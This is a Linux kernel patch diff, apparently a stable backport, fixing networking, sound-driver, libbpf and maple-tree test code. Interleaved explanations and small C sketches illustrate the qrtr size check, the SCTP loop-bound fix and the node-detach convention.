+diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c
+index 9b8a6db7a66b3..39dbeb6071965 100644
+--- a/net/ipv4/sysctl_net_ipv4.c
++++ b/net/ipv4/sysctl_net_ipv4.c
+@@ -25,6 +25,7 @@ static int ip_local_port_range_min[] = { 1, 1 };
+ static int ip_local_port_range_max[] = { 65535, 65535 };
+ static int tcp_adv_win_scale_min = -31;
+ static int tcp_adv_win_scale_max = 31;
++static int tcp_app_win_max = 31;
+ static int tcp_min_snd_mss_min = TCP_MIN_SND_MSS;
+ static int tcp_min_snd_mss_max = 65535;
+ static int ip_privileged_port_min;
+@@ -1171,6 +1172,8 @@ static struct ctl_table ipv4_net_table[] = {
+ 		.maxlen		= sizeof(u8),
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dou8vec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= &tcp_app_win_max,
+ 	},
+ 	{
+ 		.procname	= "tcp_adv_win_scale",
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index da46357f501b3..ad0a5f185a694 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -2728,7 +2728,7 @@ static int tcp_prog_seq_show(struct bpf_prog *prog, struct bpf_iter_meta *meta,
+ static void bpf_iter_tcp_put_batch(struct bpf_tcp_iter_state *iter)
+ {
+ 	while (iter->cur_sk < iter->end_sk)
+-		sock_put(iter->batch[iter->cur_sk++]);
++		sock_gen_put(iter->batch[iter->cur_sk++]);
+ }
+ 
+ static int bpf_iter_tcp_realloc_batch(struct bpf_tcp_iter_state *iter,
+@@ -2889,7 +2889,7 @@ static void *bpf_iter_tcp_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ 		 * st->bucket.  See tcp_seek_last_pos().
+ 		 */
+ 		st->offset++;
+-		sock_put(iter->batch[iter->cur_sk++]);
++		sock_gen_put(iter->batch[iter->cur_sk++]);
+ 	}
+ 
+ 	if (iter->cur_sk < iter->end_sk)
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 98a64e8d9bdaa..17d721a6add72 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -1391,9 +1391,11 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 			msg->msg_name = &sin;
+ 			msg->msg_namelen = sizeof(sin);
+ do_udp_sendmsg:
+-			if (ipv6_only_sock(sk))
+-				return -ENETUNREACH;
+-			return udp_sendmsg(sk, msg, len);
++			err = ipv6_only_sock(sk) ?
++				-ENETUNREACH : udp_sendmsg(sk, msg, len);
++			msg->msg_name = sin6;
++			msg->msg_namelen = addr_len;
++			return err;
+ 		}
+ 	}
+ 
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index 30d289044e71b..6b2ef3bb53a3d 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -1183,9 +1183,8 @@ bool mptcp_incoming_options(struct sock *sk, struct sk_buff *skb)
+ 	 */
+ 	if (TCP_SKB_CB(skb)->seq == TCP_SKB_CB(skb)->end_seq) {
+ 		if (mp_opt.data_fin && mp_opt.data_len == 1 &&
+-		    mptcp_update_rcv_data_fin(msk, mp_opt.data_seq, mp_opt.dsn64) &&
+-		    schedule_work(&msk->work))
+-			sock_hold(subflow->conn);
++		    mptcp_update_rcv_data_fin(msk, mp_opt.data_seq, mp_opt.dsn64))
++			mptcp_schedule_work((struct sock *)msk);
+ 
+ 		return true;
+ 	}
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index f0cde2d7233dc..19f35869a164a 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2638,7 +2638,7 @@ static void mptcp_worker(struct work_struct *work)
+ 
+ 	lock_sock(sk);
+ 	state = sk->sk_state;
+-	if (unlikely(state == TCP_CLOSE))
++	if (unlikely((1 << state) & (TCPF_CLOSE | TCPF_LISTEN)))
+ 		goto unlock;
+ 
+ 	mptcp_check_data_fin_ack(sk);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index fc876c2480029..125d1f58d6a43 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -366,9 +366,8 @@ void mptcp_subflow_reset(struct sock *ssk)
+ 
+ 	tcp_send_active_reset(ssk, GFP_ATOMIC);
+ 	tcp_done(ssk);
+-	if (!test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &mptcp_sk(sk)->flags) &&
+-	    schedule_work(&mptcp_sk(sk)->work))
+-		return; /* worker will put sk for us */
++	if (!test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &mptcp_sk(sk)->flags))
++		mptcp_schedule_work(sk);
+ 
+ 	sock_put(sk);
+ }
+@@ -1054,8 +1053,8 @@ static enum mapping_status get_mapping_status(struct sock *ssk,
+ 				skb_ext_del(skb, SKB_EXT_MPTCP);
+ 				return MAPPING_OK;
+ 			} else {
+-				if (updated && schedule_work(&msk->work))
+-					sock_hold((struct sock *)msk);
++				if (updated)
++					mptcp_schedule_work((struct sock *)msk);
+ 
+ 				return MAPPING_DATA_FIN;
+ 			}
+@@ -1158,17 +1157,12 @@ static void mptcp_subflow_discard_data(struct sock *ssk, struct sk_buff *skb,
+ /* sched mptcp worker to remove the subflow if no more data is pending */
+ static void subflow_sched_work_if_closed(struct mptcp_sock *msk, struct sock *ssk)
+ {
+-	struct sock *sk = (struct sock *)msk;
+-
+ 	if (likely(ssk->sk_state != TCP_CLOSE))
+ 		return;
+ 
+ 	if (skb_queue_empty(&ssk->sk_receive_queue) &&
+-	    !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags)) {
+-		sock_hold(sk);
+-		if (!schedule_work(&msk->work))
+-			sock_put(sk);
+-	}
++	    !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
++		mptcp_schedule_work((struct sock *)msk);
+ }
+ 
+ static bool subflow_can_fallback(struct mptcp_subflow_context *subflow)
+diff --git a/net/openvswitch/actions.c b/net/openvswitch/actions.c
+index ca3ebfdb30231..a8cf9a88758ef 100644
+--- a/net/openvswitch/actions.c
++++ b/net/openvswitch/actions.c
+@@ -913,7 +913,7 @@ static void do_output(struct datapath *dp, struct sk_buff *skb, int out_port,
+ {
+ 	struct vport *vport = ovs_vport_rcu(dp, out_port);
+ 
+-	if (likely(vport)) {
++	if (likely(vport && netif_carrier_ok(vport->dev))) {
+ 		u16 mru = OVS_CB(skb)->mru;
+ 		u32 cutlen = OVS_CB(skb)->cutlen;
+ 
+diff --git a/net/qrtr/af_qrtr.c b/net/qrtr/af_qrtr.c
+index 3a70255c8d02f..76f0434d3d06a 100644
+--- a/net/qrtr/af_qrtr.c
++++ b/net/qrtr/af_qrtr.c
+@@ -498,6 +498,11 @@ int qrtr_endpoint_post(struct qrtr_endpoint *ep, const void *data, size_t len)
+ 	if (!size || len != ALIGN(size, 4) + hdrlen)
+ 		goto err;
+ 
++	if ((cb->type == QRTR_TYPE_NEW_SERVER ||
++	     cb->type == QRTR_TYPE_RESUME_TX) &&
++	    size < sizeof(struct qrtr_ctrl_pkt))
++		goto err;
++
+ 	if (cb->dst_port != QRTR_PORT_CTRL && cb->type != QRTR_TYPE_DATA &&
+ 	    cb->type != QRTR_TYPE_RESUME_TX)
+ 		goto err;
+@@ -510,9 +515,6 @@ int qrtr_endpoint_post(struct qrtr_endpoint *ep, const void *data, size_t len)
+ 		/* Remote node endpoint can bridge other distant nodes */
+ 		const struct qrtr_ctrl_pkt *pkt;
+ 
+-		if (size < sizeof(*pkt))
+-			goto err;
+-
+ 		pkt = data + hdrlen;
+ 		qrtr_node_assign(node, le32_to_cpu(pkt->server.node));
+ 	}
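
The qrtr change hoists the minimum-size check so that any QRTR_TYPE_NEW_SERVER or QRTR_TYPE_RESUME_TX payload is validated before anything casts it to struct qrtr_ctrl_pkt; previously only the node-bridging branch checked, so a short control packet taking another path could be parsed past the end of its buffer. A standalone sketch of the check-then-cast idiom, with placeholder field names:

#include <stdint.h>
#include <stdio.h>
#include <string.h>

struct ctrl_pkt { uint32_t cmd; uint32_t node; uint32_t port; };

/*
 * Reject before casting: a short payload must never be reinterpreted
 * as a full control structure.
 */
static int handle_ctrl(const void *data, size_t len)
{
	struct ctrl_pkt pkt;

	if (len < sizeof(pkt))
		return -1;	/* too short: drop, don't parse */

	memcpy(&pkt, data, sizeof(pkt));
	printf("cmd=%u node=%u\n", pkt.cmd, pkt.node);
	return 0;
}

int main(void)
{
	uint8_t short_buf[4] = { 0 };
	uint8_t full_buf[12] = { 5, 0, 0, 0, 1, 0, 0, 0, 2, 0, 0, 0 };

	printf("short: %d\n", handle_ctrl(short_buf, sizeof(short_buf)));
	printf("full:  %d\n", handle_ctrl(full_buf, sizeof(full_buf)));
	return 0;
}
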
+diff --git a/net/sctp/stream_interleave.c b/net/sctp/stream_interleave.c
+index bb22b71df7a34..4fbd6d0529545 100644
+--- a/net/sctp/stream_interleave.c
++++ b/net/sctp/stream_interleave.c
+@@ -1160,7 +1160,8 @@ static void sctp_generate_iftsn(struct sctp_outq *q, __u32 ctsn)
+ 
+ #define _sctp_walk_ifwdtsn(pos, chunk, end) \
+ 	for (pos = chunk->subh.ifwdtsn_hdr->skip; \
+-	     (void *)pos < (void *)chunk->subh.ifwdtsn_hdr->skip + (end); pos++)
++	     (void *)pos <= (void *)chunk->subh.ifwdtsn_hdr->skip + (end) - \
++			    sizeof(struct sctp_ifwdtsn_skip); pos++)
+ 
+ #define sctp_walk_ifwdtsn(pos, ch) \
+ 	_sctp_walk_ifwdtsn((pos), (ch), ntohs((ch)->chunk_hdr->length) - \
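
The macro fix tightens the walk bound: a skip entry is visited only while a complete struct sctp_ifwdtsn_skip still fits before the end of the chunk, so a trailing partial entry (say, 2 leftover bytes against a 4-byte entry) is skipped instead of read out of bounds. A self-contained sketch of the bounded walk, assuming a 4-byte entry layout:

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct skip_entry { uint16_t stream; uint8_t flags; uint8_t mid; };

/* Visit entries only while a whole struct fits in [buf, buf + len). */
static void walk(const uint8_t *buf, size_t len)
{
	const struct skip_entry *pos = (const void *)buf;
	const uint8_t *end = buf + len;

	if (len < sizeof(*pos))
		return;

	for (; (const uint8_t *)pos <= end - sizeof(*pos); pos++)
		printf("stream=%u mid=%u\n", pos->stream, pos->mid);
}

int main(void)
{
	/*
	 * 10 bytes: two full 4-byte entries plus 2 trailing bytes that
	 * must not be interpreted as a third entry.
	 */
	uint8_t buf[10] = { 1, 0, 0, 7, 2, 0, 0, 9, 0xff, 0xff };

	walk(buf, sizeof(buf));
	return 0;
}

With the old strict "<" comparison against the raw end pointer, the loop body would have run once more on the two trailing bytes.
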
+diff --git a/sound/firewire/tascam/tascam-stream.c b/sound/firewire/tascam/tascam-stream.c
+index 53e094cc411f8..dfe783d01d7d2 100644
+--- a/sound/firewire/tascam/tascam-stream.c
++++ b/sound/firewire/tascam/tascam-stream.c
+@@ -490,7 +490,7 @@ int snd_tscm_stream_start_duplex(struct snd_tscm *tscm, unsigned int rate)
+ 		// packet is important for media clock recovery.
+ 		err = amdtp_domain_start(&tscm->domain, tx_init_skip_cycles, true, true);
+ 		if (err < 0)
+-			return err;
++			goto error;
+ 
+ 		if (!amdtp_domain_wait_ready(&tscm->domain, READY_TIMEOUT_MS)) {
+ 			err = -ETIMEDOUT;
+diff --git a/sound/i2c/cs8427.c b/sound/i2c/cs8427.c
+index 65012af6a36e4..f58b14b490455 100644
+--- a/sound/i2c/cs8427.c
++++ b/sound/i2c/cs8427.c
+@@ -561,10 +561,13 @@ int snd_cs8427_iec958_active(struct snd_i2c_device *cs8427, int active)
+ 	if (snd_BUG_ON(!cs8427))
+ 		return -ENXIO;
+ 	chip = cs8427->private_data;
+-	if (active)
++	if (active) {
+ 		memcpy(chip->playback.pcm_status,
+ 		       chip->playback.def_status, 24);
+-	chip->playback.pcm_ctl->vd[0].access &= ~SNDRV_CTL_ELEM_ACCESS_INACTIVE;
++		chip->playback.pcm_ctl->vd[0].access &= ~SNDRV_CTL_ELEM_ACCESS_INACTIVE;
++	} else {
++		chip->playback.pcm_ctl->vd[0].access |= SNDRV_CTL_ELEM_ACCESS_INACTIVE;
++	}
+ 	snd_ctl_notify(cs8427->bus->card,
+ 		       SNDRV_CTL_EVENT_MASK_VALUE | SNDRV_CTL_EVENT_MASK_INFO,
+ 		       &chip->playback.pcm_ctl->id);
+diff --git a/sound/pci/emu10k1/emupcm.c b/sound/pci/emu10k1/emupcm.c
+index 48af77ae8020f..6ec394fb18468 100644
+--- a/sound/pci/emu10k1/emupcm.c
++++ b/sound/pci/emu10k1/emupcm.c
+@@ -1236,7 +1236,7 @@ static int snd_emu10k1_capture_mic_close(struct snd_pcm_substream *substream)
+ {
+ 	struct snd_emu10k1 *emu = snd_pcm_substream_chip(substream);
+ 
+-	emu->capture_interrupt = NULL;
++	emu->capture_mic_interrupt = NULL;
+ 	emu->pcm_capture_mic_substream = NULL;
+ 	return 0;
+ }
+@@ -1344,7 +1344,7 @@ static int snd_emu10k1_capture_efx_close(struct snd_pcm_substream *substream)
+ {
+ 	struct snd_emu10k1 *emu = snd_pcm_substream_chip(substream);
+ 
+-	emu->capture_interrupt = NULL;
++	emu->capture_efx_interrupt = NULL;
+ 	emu->pcm_capture_efx_substream = NULL;
+ 	return 0;
+ }
+@@ -1781,17 +1781,21 @@ int snd_emu10k1_pcm_efx(struct snd_emu10k1 *emu, int device)
+ 	struct snd_kcontrol *kctl;
+ 	int err;
+ 
+-	err = snd_pcm_new(emu->card, "emu10k1 efx", device, 8, 1, &pcm);
++	err = snd_pcm_new(emu->card, "emu10k1 efx", device, emu->audigy ? 0 : 8, 1, &pcm);
+ 	if (err < 0)
+ 		return err;
+ 
+ 	pcm->private_data = emu;
+ 
+-	snd_pcm_set_ops(pcm, SNDRV_PCM_STREAM_PLAYBACK, &snd_emu10k1_fx8010_playback_ops);
++	if (!emu->audigy)
++		snd_pcm_set_ops(pcm, SNDRV_PCM_STREAM_PLAYBACK, &snd_emu10k1_fx8010_playback_ops);
+ 	snd_pcm_set_ops(pcm, SNDRV_PCM_STREAM_CAPTURE, &snd_emu10k1_capture_efx_ops);
+ 
+ 	pcm->info_flags = 0;
+-	strcpy(pcm->name, "Multichannel Capture/PT Playback");
++	if (emu->audigy)
++		strcpy(pcm->name, "Multichannel Capture");
++	else
++		strcpy(pcm->name, "Multichannel Capture/PT Playback");
+ 	emu->pcm_efx = pcm;
+ 
+ 	/* EFX capture - record the "FXBUS2" channels, by default we connect the EXTINs 
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 4ffa3a59f419f..5c6980394dcec 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -4604,7 +4604,7 @@ HDA_CODEC_ENTRY(0x80862814, "DG1 HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x80862815, "Alderlake HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x80862816, "Rocketlake HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x80862818, "Raptorlake HDMI",	patch_i915_tgl_hdmi),
+-HDA_CODEC_ENTRY(0x80862819, "DG2 HDMI",	patch_i915_adlp_hdmi),
++HDA_CODEC_ENTRY(0x80862819, "DG2 HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x8086281a, "Jasperlake HDMI",	patch_i915_icl_hdmi),
+ HDA_CODEC_ENTRY(0x8086281b, "Elkhartlake HDMI",	patch_i915_icl_hdmi),
+ HDA_CODEC_ENTRY(0x8086281c, "Alderlake-P HDMI", patch_i915_adlp_hdmi),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 50b8573b52066..6a6c72b5ea26d 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -6960,6 +6960,8 @@ enum {
+ 	ALC269_FIXUP_DELL_M101Z,
+ 	ALC269_FIXUP_SKU_IGNORE,
+ 	ALC269_FIXUP_ASUS_G73JW,
++	ALC269_FIXUP_ASUS_N7601ZM_PINS,
++	ALC269_FIXUP_ASUS_N7601ZM,
+ 	ALC269_FIXUP_LENOVO_EAPD,
+ 	ALC275_FIXUP_SONY_HWEQ,
+ 	ALC275_FIXUP_SONY_DISABLE_AAMIX,
+@@ -7256,6 +7258,29 @@ static const struct hda_fixup alc269_fixups[] = {
+ 			{ }
+ 		}
+ 	},
++	[ALC269_FIXUP_ASUS_N7601ZM_PINS] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x19, 0x03A11050 },
++			{ 0x1a, 0x03A11C30 },
++			{ 0x21, 0x03211420 },
++			{ }
++		}
++	},
++	[ALC269_FIXUP_ASUS_N7601ZM] = {
++		.type = HDA_FIXUP_VERBS,
++		.v.verbs = (const struct hda_verb[]) {
++			{0x20, AC_VERB_SET_COEF_INDEX, 0x62},
++			{0x20, AC_VERB_SET_PROC_COEF, 0xa007},
++			{0x20, AC_VERB_SET_COEF_INDEX, 0x10},
++			{0x20, AC_VERB_SET_PROC_COEF, 0x8420},
++			{0x20, AC_VERB_SET_COEF_INDEX, 0x0f},
++			{0x20, AC_VERB_SET_PROC_COEF, 0x7774},
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC269_FIXUP_ASUS_N7601ZM_PINS,
++	},
+ 	[ALC269_FIXUP_LENOVO_EAPD] = {
+ 		.type = HDA_FIXUP_VERBS,
+ 		.v.verbs = (const struct hda_verb[]) {
+@@ -9465,6 +9490,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1271, "ASUS X430UN", ALC256_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x1290, "ASUS X441SA", ALC233_FIXUP_EAPD_COEF_AND_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x12a0, "ASUS X441UV", ALC233_FIXUP_EAPD_COEF_AND_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1043, 0x12a3, "Asus N7601ZM", ALC269_FIXUP_ASUS_N7601ZM),
+ 	SND_PCI_QUIRK(0x1043, 0x12af, "ASUS UX582ZS", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x12e0, "ASUS X541SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x12f0, "ASUS X541UV", ALC256_FIXUP_ASUS_MIC),
+@@ -9662,6 +9688,9 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x30bb, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x30e2, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x310c, "ThinkCentre Station", ALC294_FIXUP_LENOVO_MIC_LOCATION),
+diff --git a/sound/pci/hda/patch_sigmatel.c b/sound/pci/hda/patch_sigmatel.c
+index a794a01a68ca6..61258b0aac8d6 100644
+--- a/sound/pci/hda/patch_sigmatel.c
++++ b/sound/pci/hda/patch_sigmatel.c
+@@ -1707,6 +1707,7 @@ static const struct snd_pci_quirk stac925x_fixup_tbl[] = {
+ };
+ 
+ static const struct hda_pintbl ref92hd73xx_pin_configs[] = {
++	// Port A-H
+ 	{ 0x0a, 0x02214030 },
+ 	{ 0x0b, 0x02a19040 },
+ 	{ 0x0c, 0x01a19020 },
+@@ -1715,9 +1716,12 @@ static const struct hda_pintbl ref92hd73xx_pin_configs[] = {
+ 	{ 0x0f, 0x01014010 },
+ 	{ 0x10, 0x01014020 },
+ 	{ 0x11, 0x01014030 },
++	// CD in
+ 	{ 0x12, 0x02319040 },
++	// Digital Mic ins
+ 	{ 0x13, 0x90a000f0 },
+ 	{ 0x14, 0x90a000f0 },
++	// Digital outs
+ 	{ 0x22, 0x01452050 },
+ 	{ 0x23, 0x01452050 },
+ 	{}
+@@ -1758,6 +1762,7 @@ static const struct hda_pintbl alienware_m17x_pin_configs[] = {
+ };
+ 
+ static const struct hda_pintbl intel_dg45id_pin_configs[] = {
++	// Analog outputs
+ 	{ 0x0a, 0x02214230 },
+ 	{ 0x0b, 0x02A19240 },
+ 	{ 0x0c, 0x01013214 },
+@@ -1765,6 +1770,9 @@ static const struct hda_pintbl intel_dg45id_pin_configs[] = {
+ 	{ 0x0e, 0x01A19250 },
+ 	{ 0x0f, 0x01011212 },
+ 	{ 0x10, 0x01016211 },
++	// Digital output
++	{ 0x22, 0x01451380 },
++	{ 0x23, 0x40f000f0 },
+ 	{}
+ };
+ 
+@@ -1955,6 +1963,8 @@ static const struct snd_pci_quirk stac92hd73xx_fixup_tbl[] = {
+ 				"DFI LanParty", STAC_92HD73XX_REF),
+ 	SND_PCI_QUIRK(PCI_VENDOR_ID_DFI, 0x3101,
+ 				"DFI LanParty", STAC_92HD73XX_REF),
++	SND_PCI_QUIRK(PCI_VENDOR_ID_INTEL, 0x5001,
++				"Intel DP45SG", STAC_92HD73XX_INTEL),
+ 	SND_PCI_QUIRK(PCI_VENDOR_ID_INTEL, 0x5002,
+ 				"Intel DG45ID", STAC_92HD73XX_INTEL),
+ 	SND_PCI_QUIRK(PCI_VENDOR_ID_INTEL, 0x5003,
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 80a15a6802094..4cd1d49c94d6d 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -1015,9 +1015,12 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ 	 * Keep `struct empty {}` on a single line,
+ 	 * only print newline when there are regular or padding fields.
+ 	 */
+-	if (vlen || t->size)
++	if (vlen || t->size) {
+ 		btf_dump_printf(d, "\n");
+-	btf_dump_printf(d, "%s}", pfx(lvl));
++		btf_dump_printf(d, "%s}", pfx(lvl));
++	} else {
++		btf_dump_printf(d, "}");
++	}
+ 	if (packed)
+ 		btf_dump_printf(d, " __attribute__((packed))");
+ }
+diff --git a/tools/testing/radix-tree/maple.c b/tools/testing/radix-tree/maple.c
+index aceb6011315c2..18e319e6ce335 100644
+--- a/tools/testing/radix-tree/maple.c
++++ b/tools/testing/radix-tree/maple.c
+@@ -107,6 +107,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mn->slot[1] != NULL);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+ 
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 	mas.node = MAS_START;
+ 	mas_nomem(&mas, GFP_KERNEL);
+@@ -159,6 +160,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != i);
+ 		MT_BUG_ON(mt, !mn);
+ 		MT_BUG_ON(mt, not_empty(mn));
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 	}
+ 
+@@ -191,6 +193,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		MT_BUG_ON(mt, not_empty(mn));
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != i - 1);
+ 		MT_BUG_ON(mt, !mn);
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 	}
+ 
+@@ -209,6 +212,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			mn = mas_pop_node(&mas);
+ 			MT_BUG_ON(mt, not_empty(mn));
+ 			MT_BUG_ON(mt, mas_allocated(&mas) != j - 1);
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 		}
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+@@ -232,6 +236,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			MT_BUG_ON(mt, mas_allocated(&mas) != i - j);
+ 			mn = mas_pop_node(&mas);
+ 			MT_BUG_ON(mt, not_empty(mn));
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 			MT_BUG_ON(mt, mas_allocated(&mas) != i - j - 1);
+ 		}
+@@ -268,6 +273,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			mn = mas_pop_node(&mas); /* get the next node. */
+ 			MT_BUG_ON(mt, mn == NULL);
+ 			MT_BUG_ON(mt, not_empty(mn));
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 		}
+ 		MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+@@ -293,6 +299,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 			mn = mas_pop_node(&mas2); /* get the next node. */
+ 			MT_BUG_ON(mt, mn == NULL);
+ 			MT_BUG_ON(mt, not_empty(mn));
++			mn->parent = ma_parent_ptr(mn);
+ 			ma_free_rcu(mn);
+ 		}
+ 		MT_BUG_ON(mt, mas_allocated(&mas2) != 0);
+@@ -333,10 +340,12 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 2);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, not_empty(mn));
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 	for (i = 1; i <= MAPLE_ALLOC_SLOTS + 1; i++) {
+ 		mn = mas_pop_node(&mas);
+ 		MT_BUG_ON(mt, not_empty(mn));
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 	}
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != 0);
+@@ -374,6 +383,7 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		mas_node_count(&mas, i); /* Request */
+ 		mas_nomem(&mas, GFP_KERNEL); /* Fill request */
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mas_destroy(&mas);
+ 
+@@ -381,10 +391,13 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 		mas_node_count(&mas, i); /* Request */
+ 		mas_nomem(&mas, GFP_KERNEL); /* Fill request */
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mn = mas_pop_node(&mas); /* get the next node. */
++		mn->parent = ma_parent_ptr(mn);
+ 		ma_free_rcu(mn);
+ 		mas_destroy(&mas);
+ 	}
+@@ -35368,6 +35381,7 @@ static noinline void check_prealloc(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, allocated != 1 + height * 3);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != allocated - 1);
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 	MT_BUG_ON(mt, mas_preallocate(&mas, ptr, GFP_KERNEL) != 0);
+ 	mas_destroy(&mas);
+@@ -35385,6 +35399,7 @@ static noinline void check_prealloc(struct maple_tree *mt)
+ 	mas_destroy(&mas);
+ 	allocated = mas_allocated(&mas);
+ 	MT_BUG_ON(mt, allocated != 0);
++	mn->parent = ma_parent_ptr(mn);
+ 	ma_free_rcu(mn);
+ 
+ 	MT_BUG_ON(mt, mas_preallocate(&mas, ptr, GFP_KERNEL) != 0);
+@@ -35755,6 +35770,7 @@ void farmer_tests(void)
+ 	tree.ma_root = mt_mk_node(node, maple_leaf_64);
+ 	mt_dump(&tree);
+ 
++	node->parent = ma_parent_ptr(node);
+ 	ma_free_rcu(node);
+ 
+ 	/* Check things that will make lockdep angry */
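
Every hunk in this maple tree test file inserts "mn->parent = ma_parent_ptr(mn)" before ma_free_rcu(): a node whose parent slot points back at itself is the tree's marker for a detached node, and the free path expects nodes to carry it. A toy model of the convention follows; the real ma_parent_ptr() also encodes type bits in the low bits of the pointer, which this sketch drops.

#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

struct node { struct node *parent; int data; };

#define ma_parent_ptr(n) (n)	/* self-parent marks a detached node */

static void node_free(struct node *n)
{
	/* Freeing a node that still looks linked into a tree is a bug. */
	assert(n->parent == n && "node must be detached before free");
	free(n);
}

int main(void)
{
	struct node *n = calloc(1, sizeof(*n));

	if (!n)
		return 1;
	n->parent = ma_parent_ptr(n);	/* detach marker, as in the tests */
	node_free(n);
	puts("freed a properly detached node");
	return 0;
}
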
